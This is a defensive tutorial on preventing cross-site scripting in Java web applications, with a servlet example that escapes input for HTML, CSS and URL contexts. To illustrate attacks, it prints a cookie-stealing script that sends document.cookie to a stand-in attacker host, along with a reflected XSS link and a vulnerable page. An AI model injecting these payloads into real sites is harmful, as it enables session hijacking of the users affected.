Make Your Java Web Applications Impervious to Cross-site Scripting
If you develop Java-based web applications, you can use a servlet filter to intercept and modify the user's request and response. Specifically, you can use server-side filtering to stop malicious input that arrives through request parameters and cookies before it reaches your application. This article explains how to create and implement a custom filter that guards against the various types of cross-site scripting attacks.
Types of Cross-site Scripting
There are three types of cross-site scripting attacks:
In a persistent cross-site scripting attack, the server stores the attacker's script and later displays it on pages served to other users. For example, many sites offer comments sections where users post comments, which the site stores in a database. Normally, a user is tracked by a session ID cookie, so an attacker can post a comment containing a script that steals other users' cookies. For example, the following script sends the user's cookie details to the attacker's host:
<script>document.location= 'http://www. attackerhost/crack.html?'+document.cookie</script>
In a non-persistent cross-site scripting attack, the attacker's script arrives through the user's query parameters or HTML form submissions. The server includes this script in the requested page and sends it back to the user without proper output validation. Here is an example of a page that exposes the user's cookie details through a URL:
<html><script>var pos=document.URL.indexOf("user=")+5; document.write(document.URL.substring(pos,document.URL.length));</script></html>
This page uses the value of the "user" parameter from a URL such as the following:
http://www. examplesite /welcome.html?user=siva
An attacker can abuse this by luring the client into clicking a link like this:
http://www. examplesite /welcome.html?user=<script>alert(document.cookie)</script>
Client-Side Validation for Cross-Site Scripting
Use the following fairly simple methods to eliminate cross-site scripting vulnerabilities.
- Escaping: Escape all untrusted data using a method appropriate for the output context (HTML, CSS or URL). Here are the different escaping schemes for untrusted characters:
- HTML numeric entity encoding
- CSS escaping
- URL encoding
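The following is an added example, not code from the article or its filter, showing the three escaping schemes above applied server-side to the "user" parameter from the welcome-page scenario in the previous section. It assumes a javax.servlet container (the package name changes to jakarta.servlet on newer containers) and Java 10 or later for the URLEncoder overload; the class names XssEncoder and WelcomeServlet and the /welcome and /profile paths are invented for the example.

```java
import java.io.IOException;
import java.io.PrintWriter;
import java.net.URLEncoder;
import java.nio.charset.StandardCharsets;

import javax.servlet.ServletException;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

/**
 * Echoes the untrusted "user" query parameter into three output contexts,
 * escaping it differently for each. Added example; names are assumptions.
 */
@WebServlet("/welcome")
public class WelcomeServlet extends HttpServlet {

    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp)
            throws ServletException, IOException {
        // Untrusted: taken straight from the query string, e.g. ?user=<script>...
        String user = req.getParameter("user");

        resp.setContentType("text/html;charset=UTF-8");
        PrintWriter out = resp.getWriter();
        out.println("<!DOCTYPE html><html><head><title>Welcome</title>");
        // CSS context: the value lands inside a quoted CSS string.
        out.println("<style>h1::after { content: \"" + XssEncoder.forCss(user) + "\"; }</style>");
        out.println("</head><body>");
        // VULNERABLE equivalent of the article's document.write page (do not use):
        //   out.println("<h1>Welcome " + user + "</h1>");
        // HTML body context: numeric entities mean '<' can never open a tag.
        out.println("<h1>Welcome " + XssEncoder.forHtml(user) + "</h1>");
        // URL context: percent-encoding yields only [A-Za-z0-9*-._+%], which is
        // also inert inside a double-quoted HTML attribute.
        out.println("<a href=\"/profile?user=" + XssEncoder.forUrl(user) + "\">Profile</a>");
        out.println("</body></html>");
    }
}

/** Context-specific encoders; package-private so the file has one public class. */
final class XssEncoder {

    private XssEncoder() {}

    private static boolean isAlnum(int cp) {
        return (cp >= 'a' && cp <= 'z') || (cp >= 'A' && cp <= 'Z') || (cp >= '0' && cp <= '9');
    }

    /** HTML numeric entity encoding: every non-alphanumeric code point becomes &#NN; */
    static String forHtml(String untrusted) {
        if (untrusted == null) return "";
        StringBuilder sb = new StringBuilder(untrusted.length() * 2);
        untrusted.codePoints().forEach(cp -> {
            if (isAlnum(cp)) sb.appendCodePoint(cp);
            else sb.append("&#").append(cp).append(';');
        });
        return sb.toString();
    }

    /** CSS escaping: non-alphanumerics become a backslash, the hex code point and a terminating space. */
    static String forCss(String untrusted) {
        if (untrusted == null) return "";
        StringBuilder sb = new StringBuilder(untrusted.length() * 3);
        untrusted.codePoints().forEach(cp -> {
            if (isAlnum(cp)) sb.appendCodePoint(cp);
            else sb.append('\\').append(Integer.toHexString(cp)).append(' ');
        });
        return sb.toString();
    }

    /** URL encoding of a single query-string component as UTF-8 percent-encoding (Java 10+ overload). */
    static String forUrl(String untrusted) {
        if (untrusted == null) return "";
        return URLEncoder.encode(untrusted, StandardCharsets.UTF_8);
    }

    /** Stand-alone check using the payload from the article's example link (constructed input). */
    public static void main(String[] args) {
        String payload = "<script>alert(document.cookie)</script>";
        System.out.println("HTML: " + forHtml(payload));
        System.out.println("CSS:  " + forCss(payload));
        System.out.println("URL:  " + forUrl(payload));
    }
}
```

The design point is that the encoder is chosen by where the value is written, not by what the value looks like: the same "user" string is encoded three different ways on one page, and none of the three encoders tries to detect or strip "<script>", so a payload that evades a blacklist still cannot break out of its context.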